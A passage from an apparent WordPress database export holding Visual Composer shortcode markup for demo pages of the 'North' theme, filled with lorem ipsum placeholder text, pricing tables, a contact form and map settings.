Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405453002397{background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" customcolor_heading=\"#303030\" customcolor_text=\"#2d2d2d\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452676244{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i61.jpg?id=541) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home11','','publish','open','open','','home11','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=753',0,'page','',0),(1926,1,'2014-07-15 20:01:35','2014-07-15 20:01:35','[vc_row css=\".vc_custom_1405457897351{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #4c4c4c !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"false\" bg_overlay=\"dots_dark\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][vntd_fullscreen_slider text_static=\"The goods you need now\" style=\"style1\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"WE CREATE AWESOME THEMES!,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452942369{padding-bottom: 50px !important;background-color: #1a1a1a !important;border-color: #eeeeee !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" more_url=\"http://veented.com/themes/north/portfolio/\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406710070153{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406710078643{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406710087331{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506397651{padding-top: 0px !important;background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452967628{padding-bottom: 70px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405451859507{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1a1a1a !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452979786{margin-bottom: -15px !important;padding-bottom: 0px !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409774017224{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309a875-582a0add-8af2\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309a875-582a0add-8af2\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309a875-582a0add-8af2\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452992592{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405453002397{background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" customcolor_heading=\"#303030\" customcolor_text=\"#2d2d2d\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405453013868{padding-bottom: 70px !important;background-color: #1b1b1b !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" color_scheme=\"white\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405452676244{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i61.jpg?id=541) 